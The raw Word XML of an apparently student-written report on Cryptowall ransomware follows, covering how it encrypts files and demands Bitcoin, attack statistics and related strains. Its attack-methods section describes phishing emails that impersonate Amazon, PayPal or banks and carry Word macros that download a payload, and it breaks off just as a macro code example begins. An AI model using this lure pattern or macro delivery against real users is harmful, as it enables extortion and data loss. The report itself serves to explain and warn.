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F9163A" w:rsidR="009150E5" w:rsidRDefault="7A011108" w14:paraId="5E5787A5" w14:textId="790EF339">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9163A">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Cryptowall Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00F9163A" w:rsidR="7A011108" w:rsidP="7A011108" w:rsidRDefault="7A011108" w14:paraId="05422916" w14:textId="40FF6363">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9163A">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7A011108" w:rsidP="7A011108" w:rsidRDefault="7A011108" w14:paraId="3B7F6DC5" w14:textId="4802CC69">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A Cryptowall infection on a local or remote computer system is a type of military level encryption technique that can cause loss of personal and commercial data.  </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1671216261"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00B9686F">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B9686F">
            <w:instrText xml:space="preserve"> CITATION Cry \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00B9686F">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r w:rsidR="00B9686F">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00030AA8" w:rsidP="7A011108" w:rsidRDefault="03F6C9C5" w14:paraId="1FBB466F" w14:textId="4CCA9527">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">How the Cryptowall virus works is that System Users can be lured into opening an email attachment or hyperlink. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7A011108" w:rsidP="7A011108" w:rsidRDefault="7A011108" w14:paraId="0E72FC55" w14:textId="2B570243">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This attachment or link can run a remote script on your computer from another system. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7A011108" w:rsidP="7A011108" w:rsidRDefault="7A011108" w14:paraId="5ACFB484" w14:textId="09306ADB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In this case the Cryptowall virus encrypts data files (</w:t>
      </w:r>
      <w:r w:rsidR="00B52B6C">
        <w:t xml:space="preserve">e.g. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.PDF, .DOC, .ASP) and then </w:t>
      </w:r>
      <w:r w:rsidR="00030AA8">
        <w:t>requires System Users</w:t>
      </w:r>
      <w:r w:rsidR="007B3C6E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE17E1">
        <w:t xml:space="preserve">to transfer </w:t>
      </w:r>
      <w:r w:rsidR="007B3C6E">
        <w:t>specified funds</w:t>
      </w:r>
      <w:r w:rsidR="00CE17E1">
        <w:t>, converted to Bitcoin, to a</w:t>
      </w:r>
      <w:r w:rsidR="001A2953">
        <w:t>n anonymous</w:t>
      </w:r>
      <w:r w:rsidR="00CE17E1">
        <w:t xml:space="preserve"> Bitcoin wallet</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="526376230"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C32E24">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C32E24">
            <w:instrText xml:space="preserve"> CITATION Bri \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C32E24">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[2]</w:t>
          </w:r>
          <w:r w:rsidR="00C32E24">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="001A2953">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A2953" w:rsidP="7A011108" w:rsidRDefault="001A2953" w14:paraId="5FACC839" w14:textId="0BCDA89C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Once the transfer takes place, System Users may get a decryption key</w:t>
      </w:r>
      <w:r w:rsidR="00C159CB">
        <w:t>, which will allow decryption of encrypted files</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1746027049"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00E404E7">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00E404E7">
            <w:instrText xml:space="preserve"> CITATION Cas16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E404E7">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[3]</w:t>
          </w:r>
          <w:r w:rsidR="00E404E7">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00C159CB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7A011108" w:rsidP="7A011108" w:rsidRDefault="7A011108" w14:paraId="72FE7681" w14:textId="4297573B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This method is referred to as </w:t>
      </w:r>
      <w:r w:rsidR="000209CC">
        <w:t>Ransomware</w:t>
      </w:r>
      <w:r>
        <w:t>, a process by which</w:t>
      </w:r>
      <w:r w:rsidR="001A2953">
        <w:t xml:space="preserve"> System Users is literally held to ransom</w:t>
      </w:r>
      <w:r w:rsidR="00887AC7">
        <w:t xml:space="preserve"> to provide currency for return of their personal encrypted files</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1719390646"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="005652B5">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="005652B5">
            <w:instrText xml:space="preserve"> CITATION Ran18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="005652B5">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
          <w:r w:rsidR="005652B5">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00887AC7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00F9163A" w:rsidR="7A011108" w:rsidP="7A011108" w:rsidRDefault="7A011108" w14:paraId="2142A3A6" w14:textId="529F2E35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9163A">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Current State</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00887AC7" w:rsidP="00887AC7" w:rsidRDefault="00887AC7" w14:paraId="67527972" w14:textId="0810EC53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D2699D" w:rsidP="00887AC7" w:rsidRDefault="00D2699D" w14:paraId="0C46DFDB" w14:textId="3627AB4B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As of writing this report the </w:t>
      </w:r>
      <w:r w:rsidR="000157DB">
        <w:t>current amount of Ransomware attacks stands at</w:t>
      </w:r>
      <w:r w:rsidR="00E55058">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D2782">
        <w:t>100,000</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="875661036"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="008E4EF7">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="008E4EF7">
            <w:instrText xml:space="preserve"> CITATION The18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="008E4EF7">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[5]</w:t>
          </w:r>
          <w:r w:rsidR="008E4EF7">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E55058">
        <w:t>. In 201</w:t>
      </w:r>
      <w:r w:rsidR="00902408">
        <w:t>5-2016</w:t>
      </w:r>
      <w:r w:rsidR="00E55058">
        <w:t xml:space="preserve"> the rate of attacks </w:t>
      </w:r>
      <w:r w:rsidR="00902408">
        <w:t xml:space="preserve">reached </w:t>
      </w:r>
      <w:r w:rsidR="00033E3C">
        <w:t>23,000 to 35,000 a month</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1576888407"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00744A06">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00744A06">
            <w:instrText xml:space="preserve"> CITATION Ran16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00744A06">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[6]</w:t>
          </w:r>
          <w:r w:rsidR="00744A06">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00033E3C">
        <w:t>. This reached a peak</w:t>
      </w:r>
      <w:r w:rsidR="00744A06">
        <w:t xml:space="preserve"> in 2016</w:t>
      </w:r>
      <w:r w:rsidR="00E55058">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A41E52">
        <w:t>during March where the Cryptowall style ransomware ‘Locky’ caused 56,000 new infections</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-102955547"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="007307C1">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007307C1">
            <w:instrText xml:space="preserve"> CITATION Ran16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="007307C1">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[6]</w:t>
          </w:r>
          <w:r w:rsidR="007307C1">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00A41E52">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007307C1" w:rsidP="00887AC7" w:rsidRDefault="007307C1" w14:paraId="73E9C316" w14:textId="015216A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004832E0" w:rsidP="00887AC7" w:rsidRDefault="004832E0" w14:paraId="56BAF152" w14:textId="4DE127E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Cryptowall is now not the only Ransomware on the market, there are multiple derivatives as mentioned above:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004832E0" w:rsidP="03F6C9C5" w:rsidRDefault="004832E0" w14:paraId="03D47E8E" w14:textId="0A3F059A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Locky</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1805665421"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="006252AA">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="006252AA">
            <w:instrText xml:space="preserve"> CITATION loo18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="006252AA">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[7]</w:t>
          </w:r>
          <w:r w:rsidR="006252AA">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="004832E0" w:rsidP="03F6C9C5" w:rsidRDefault="000870DF" w14:paraId="620C4359" w14:textId="22BAE83C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Onion</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1830557237"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION oni18 \l 2057 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[8]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="004832E0" w:rsidP="03F6C9C5" w:rsidRDefault="00987D17" w14:paraId="453BCE3F" w14:textId="2E980E7C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wannacry</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-10918899"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="009724D7">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009724D7">
            <w:instrText xml:space="preserve"> CITATION ran18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="009724D7">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[9]</w:t>
          </w:r>
          <w:r w:rsidR="009724D7">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00C62CE3" w:rsidP="00887AC7" w:rsidRDefault="00C62CE3" w14:paraId="1FD9236F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00F9163A" w:rsidR="7A011108" w:rsidP="7A011108" w:rsidRDefault="7A011108" w14:paraId="4C349A8C" w14:textId="2D140CEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9163A">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Attack Methods</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C62CE3" w:rsidP="00C62CE3" w:rsidRDefault="00C62CE3" w14:paraId="7540E6D1" w14:textId="55E3D064">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C62CE3" w:rsidP="00C62CE3" w:rsidRDefault="03F6C9C5" w14:paraId="1FBE7EE5" w14:textId="7FB4413F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>How Ransomware attacks occur rely on the complacency of System Users and the organisation. A legacy method of infiltration and infection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00521D99" w:rsidP="00521D99" w:rsidRDefault="00521D99" w14:paraId="0F187FEE" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00521D99" w:rsidR="00B301D9" w:rsidP="00521D99" w:rsidRDefault="00CE230A" w14:paraId="6FE39109" w14:textId="33309F99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00521D99">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Email Attachment</w:t>
      </w:r>
      <w:r w:rsidR="00E20E39">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/MS Word Macro Hack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C37157" w:rsidP="00C37157" w:rsidRDefault="00C37157" w14:paraId="5781F2B3" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C37157" w:rsidP="00C37157" w:rsidRDefault="03F6C9C5" w14:paraId="12A4D168" w14:textId="2E4EBFFC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="52CD5C31">
        <w:rPr/>
        <w:t xml:space="preserve">A Microsoft Word document is attached to an email. This seemingly harmless attachment can arrive from Amazon, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="52CD5C31">
        <w:rPr/>
        <w:t>Paypal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="52CD5C31">
        <w:rPr/>
        <w:t xml:space="preserve"> or any of System Users Banks as well as many well-known organisations. As the email may contain the familiar organisations logo and links the unsuspecting user will likely download the attachment and open the document. The wording of the email generally implies some instant urgent action by System Users needs to take place or their Amazon account will be locked, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="52CD5C31">
        <w:rPr/>
        <w:t>Paypal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="52CD5C31">
        <w:rPr/>
        <w:t xml:space="preserve"> will be suspended or activity has taken place on their bank account that requires attention.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C37157" w:rsidP="00C37157" w:rsidRDefault="00C37157" w14:paraId="1276CA4B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006258FF" w:rsidP="006258FF" w:rsidRDefault="006258FF" w14:paraId="6FEAE9A2" w14:textId="3D728004">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47AB0DED" wp14:editId="3EE90CF0">
            <wp:extent cx="4695824" cy="1699895"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="405110774" name="picture" descr="Capture">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
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4695824" cy="1699895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B4513" w:rsidP="006258FF" w:rsidRDefault="003B4513" w14:paraId="6CA5E7D3" w14:textId="33BB89B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F6632" w:rsidP="006258FF" w:rsidRDefault="008F6632" w14:paraId="02D93D08" w14:textId="2DC23351">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C00F3B" w:rsidP="00F361B7" w:rsidRDefault="03F6C9C5" w14:paraId="3D4529B8" w14:textId="7BE7A962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In a simple word Document macro code written in VB and taking advantage of .NET functionality, the document has payload </w:t>
      </w:r>
      <w:r w:rsidR="00D079FA">
        <w:t xml:space="preserve">downloading </w:t>
      </w:r>
      <w:r>
        <w:t>capabilities. Microsoft Word macros provided the capability for System Users to “record” repetitive processes and automate them. Each recording session is immediately transferred into code. Coders and Hackers can write this code without amateur</w:t>
      </w:r>
      <w:r w:rsidR="000731FD">
        <w:t>ish</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> recording processes. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F361B7" w:rsidP="00F361B7" w:rsidRDefault="00F361B7" w14:paraId="6F332918" w14:textId="2DC23351">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F361B7" w:rsidP="00F361B7" w:rsidRDefault="00F361B7" w14:paraId="4EAB6EB4" w14:textId="018D8F45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="52CD5C31">
        <w:rPr/>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="52CD5C31">
        <w:rPr/>
        <w:t>n example of the code used with annotations in green:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009576B7" w:rsidP="00F361B7" w:rsidRDefault="009576B7" w14:paraId="2055B79B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00784877" w:rsidR="00504046" w:rsidP="00504046" w:rsidRDefault="00504046" w14:paraId="258F9A0A" w14:textId="16E61339">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">//On Open </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Word Document</w:t>
      </w:r>
      <w:r w:rsidR="00223171">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> run the following code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F6632" w:rsidP="006258FF" w:rsidRDefault="00FF21BF" w14:paraId="53E39CF5" w14:textId="7BD8A66F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF21BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8D38C9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Sub</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF21BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
